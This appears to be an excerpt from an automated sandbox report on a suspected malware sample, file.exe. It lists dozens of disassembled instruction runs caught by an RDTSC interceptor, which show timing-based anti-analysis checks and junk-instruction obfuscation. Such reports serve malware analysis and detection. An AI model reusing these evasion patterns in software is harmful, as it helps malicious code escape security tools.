Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A2B70 second address: 12A2C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B423h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jnl 00007FC2CCC4B41Ch 0x00000014 jo 00007FC2CCC4B418h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jnp 00007FC2CCC4B429h 0x00000025 jmp 00007FC2CCC4B423h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push ecx 0x0000002f jbe 00007FC2CCC4B418h 0x00000035 push esi 0x00000036 pop esi 0x00000037 pop ecx 0x00000038 pop eax 0x00000039 add ecx, 165EDA52h 0x0000003f push 00000003h 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007FC2CCC4B418h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 00000015h 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b or dword ptr [ebp+122D2591h], edi 0x00000061 push 00000000h 0x00000063 mov ecx, dword ptr [ebp+122D1A81h] 0x00000069 push 00000003h 0x0000006b mov ecx, dword ptr [ebp+122D3764h] 0x00000071 xor ecx, 0F0D61DAh 0x00000077 push B023AA16h 0x0000007c push eax 0x0000007d push edx 0x0000007e js 00007FC2CCC4B41Ch 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A2C1B second address: 12A2C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A2C1F second address: 12A2C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FC2CCC4B416h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A2C29 second address: 12A2C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A2D18 second address: 12A2D1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C1F7D second address: 12C1F96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC2CCD28613h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C2145 second address: 12C2149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C2149 second address: 12C2162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C2162 second address: 12C2166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12C2166 second address: 12C2170 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2CCD28606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2170 second address: 12C2176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2176 second address: 12C217E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C217E second address: 12C2182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E19 second address: 12C2E33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E33 second address: 12C2E43 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC2CCC4B41Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E43 second address: 12C2E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E47 second address: 12C2E51 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2CCC4B416h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3106 second address: 12C3130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28618h 0x00000007 jp 00007FC2CCD28606h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3130 second address: 12C3136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3136 second address: 12C313A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C313A second address: 12C3167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCC4B41Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC2CCC4B41Fh 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jne 00007FC2CCC4B416h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C32D3 second address: 12C32D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C35B9 second address: 12C35C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007FC2CCC4B416h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C6609 second address: 12C6635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC2CCD2860Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C6635 second address: 12C6639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7816 second address: 12C781A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296776 second address: 129677C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129677C second address: 1296789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296789 second address: 129679C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2CCC4B416h 0x00000008 jnc 00007FC2CCC4B416h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129679C second address: 12967A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC2CCD28606h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF0A9 second address: 12CF0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF0AD second address: 12CF0DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FC2CCD28606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC2CCD28614h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FC2CCD2860Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1FCB second address: 12D1FD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1FD1 second address: 12D2012 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jne 00007FC2CCD2860Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC2CCD28615h 0x0000001d popad 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2012 second address: 12D2016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2016 second address: 12D2020 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC2CCD28606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D236D second address: 12D2371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2371 second address: 12D2384 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b js 00007FC2CCD28606h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2453 second address: 12D246B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC2CCC4B416h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FC2CCC4B416h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2547 second address: 12D255E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD2860Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007FC2CCD28606h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D255E second address: 12D2569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2569 second address: 12D256F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D26E5 second address: 12D26EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2AC5 second address: 12D2ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2FA0 second address: 12D2FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D30D0 second address: 12D3117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FC2CCD28608h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC2CCD28618h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3117 second address: 12D311B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D311B second address: 12D3121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3121 second address: 12D3127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D4054 second address: 12D4074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FC2CCD28614h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D4074 second address: 12D4079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D510B second address: 12D5186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD2860Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and si, 11EDh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FC2CCD28608h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1796h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FC2CCD28608h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d pushad 0x0000004e mov edx, dword ptr [ebp+122D2380h] 0x00000054 mov dword ptr [ebp+1244F42Bh], edi 0x0000005a popad 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jbe 00007FC2CCD2860Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5186 second address: 12D518A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5BE0 second address: 12D5BEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5BEE second address: 12D5BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5BF2 second address: 12D5C0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCD28618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7D18 second address: 12D7D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2CCC4B427h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D3594h] 0x00000010 mov esi, 4B65C9A7h 0x00000015 push 00000000h 0x00000017 mov esi, 20A40677h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FC2CCC4B418h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov di, 6183h 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f ja 00007FC2CCC4B416h 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FC2CCC4B41Ah 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D91FF second address: 12D9205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9205 second address: 12D9209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D8FBB second address: 12D8FC5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2CCD28606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9209 second address: 12D9292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FC2CCC4B418h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 clc 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FC2CCC4B418h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 push 00000000h 0x00000042 add dword ptr [ebp+12488BD3h], eax 0x00000048 jmp 00007FC2CCC4B426h 0x0000004d push eax 0x0000004e pushad 0x0000004f pushad 0x00000050 jmp 00007FC2CCC4B425h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9292 second address: 12D929B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA533 second address: 12DA538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFA51 second address: 12DFA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 jns 00007FC2CCD2860Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFA69 second address: 12DFA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E09D1 second address: 12E09D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E09D5 second address: 12E0A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FC2CCC4B421h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FC2CCC4B418h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b pushad 0x0000002c mov eax, dword ptr [ebp+122D3768h] 0x00000032 mov dword ptr [ebp+122D19FFh], esi 0x00000038 popad 0x00000039 push 00000000h 0x0000003b mov edi, ebx 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007FC2CCC4B41Bh 0x00000044 pushad 0x00000045 jmp 00007FC2CCC4B41Dh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0B92 second address: 12E0BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC2CCD28618h 0x00000008 jo 00007FC2CCD28606h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 ja 00007FC2CCD2860Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0BC0 second address: 12E0C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 mov edi, dword ptr [ebp+122D5502h] 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr [ebp+12488BD3h], ebx 0x00000019 add dword ptr [ebp+122D2EFCh], esi 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov ebx, dword ptr [ebp+122D35A8h] 0x0000002c mov eax, dword ptr [ebp+122D0139h] 0x00000032 clc 0x00000033 push FFFFFFFFh 0x00000035 mov ebx, dword ptr [ebp+122D37B0h] 0x0000003b nop 0x0000003c jnp 00007FC2CCC4B42Ch 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3102 second address: 12E3125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC2CCD28618h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0C05 second address: 12E0C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2CCC4B41Eh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0C1E second address: 12E0C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E64F2 second address: 12E64F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E64F9 second address: 12E6585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FC2CCD28608h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call 00007FC2CCD28614h 0x00000029 pop ebx 0x0000002a jmp 00007FC2CCD28618h 0x0000002f push 00000000h 0x00000031 movsx edi, di 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FC2CCD28608h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D240Bh], ebx 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 jne 00007FC2CCD28608h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6585 second address: 12E6589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8606 second address: 12E860A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E76A6 second address: 12E76B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jl 00007FC2CCC4B416h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E860A second address: 12E860E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E76B3 second address: 12E76DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC2CCC4B428h 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FC2CCC4B416h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94C8 second address: 12E94CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
